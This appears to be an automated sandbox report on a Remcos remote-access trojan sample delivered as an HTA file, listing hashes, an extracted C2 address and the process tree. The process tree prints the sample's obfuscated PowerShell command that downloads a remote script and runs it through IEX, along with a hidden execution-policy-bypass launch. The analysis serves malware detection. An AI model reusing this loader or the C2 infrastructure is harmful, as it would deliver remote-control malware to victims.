Overview

overview

10

Static

static

Appraisa.vbs

windows7_x64

10

Appraisa.vbs

windows10_x64

10

Property.hta

windows7_x64

10

Property.hta

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    21-04-2021 14:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Property.hta

  • Size

    892B

  • MD5

    aa6ce10d162230b25a61485b825e63f7

  • SHA1

    3c67a18949e8ce67895f3faecd1ad0700afcb676

  • SHA256

    59d9dea1d62242b9bef74b91343ed8ef56525dfd9d0a9014494f487a15686fc0

  • SHA512

    5f4d58f15b5020fb0506ce52b09737ba7beb0743a1bc1b77086ec16875f30e3114e84ae3f8a18b19755634ec124cb5254da2d24901317ab98591b20750c9de45

Score
10/10
remcosrat

Malware Config

Extracted

Family

remcos

C2

194.5.97.183:8888

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Property.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4804
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3868
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2292
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          4⤵
            PID:1848
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            4⤵
              PID:4036
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              4⤵
              • Suspicious use of SetWindowsHookEx
              PID:1852

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      Credential Access

      Discovery

      System Information Discovery

      1
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
        MD5

        c2d06c11dd1f1a8b1dedc1a311ca8cdc

        SHA1

        75c07243f9cb80a9c7aed2865f9c5192cc920e7e

        SHA256

        91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586

        SHA512

        db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d

        Download Submit
      • C:\Users\Public\ Microsoft.ps1
        MD5

        eda0264cc0baa7804ce2a32a99aa9b98

        SHA1

        274b4d04e802370cac624649ea30149dded4e053

        SHA256

        950cc79c3173d2a1ad76a7b8e64c9100ca929caf0201396758380ff2d712680f

        SHA512

        43f6dd07e297c157f54147aa34512b4812f2650f990865c81181e14d379bf12352fcc3c2d20fbfb535d8bf2a3b5ebc7ab6aa0cd47ab498f0d1f5818e41bf9a74

        Download Submit
      • memory/1852-188-0x0000000000400000-0x0000000000478000-memory.dmp
        Filesize

        480KB

        Download
      • memory/1852-187-0x000000000042EEEF-mapping.dmp
        Download
      • memory/2292-142-0x0000000000000000-mapping.dmp
        Download
      • memory/2292-181-0x0000000006CA0000-0x0000000006CB8000-memory.dmp
        Filesize

        96KB

        Download
      • memory/2292-163-0x00000000083D0000-0x00000000083D1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2292-151-0x0000000006B42000-0x0000000006B43000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2292-149-0x0000000006B40000-0x0000000006B41000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3868-122-0x0000000007640000-0x0000000007641000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3868-125-0x0000000008230000-0x0000000008231000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3868-127-0x0000000008690000-0x0000000008691000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3868-132-0x00000000099D0000-0x00000000099D1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3868-133-0x0000000009390000-0x0000000009391000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3868-134-0x00000000071C3000-0x00000000071C4000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3868-139-0x000000000A0F0000-0x000000000A0F1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3868-140-0x0000000009860000-0x0000000009861000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3868-141-0x000000000A690000-0x000000000A691000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3868-126-0x0000000008850000-0x0000000008851000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3868-124-0x0000000007EA0000-0x0000000007EA1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3868-123-0x0000000007E30000-0x0000000007E31000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3868-114-0x0000000000000000-mapping.dmp
        Download
      • memory/3868-121-0x00000000075A0000-0x00000000075A1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3868-120-0x00000000071C2000-0x00000000071C3000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3868-119-0x00000000071C0000-0x00000000071C1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3868-118-0x0000000007800000-0x0000000007801000-memory.dmp
        Filesize

        4KB

        Download
      • memory/3868-117-0x0000000004B50000-0x0000000004B51000-memory.dmp
        Filesize

        4KB

        Download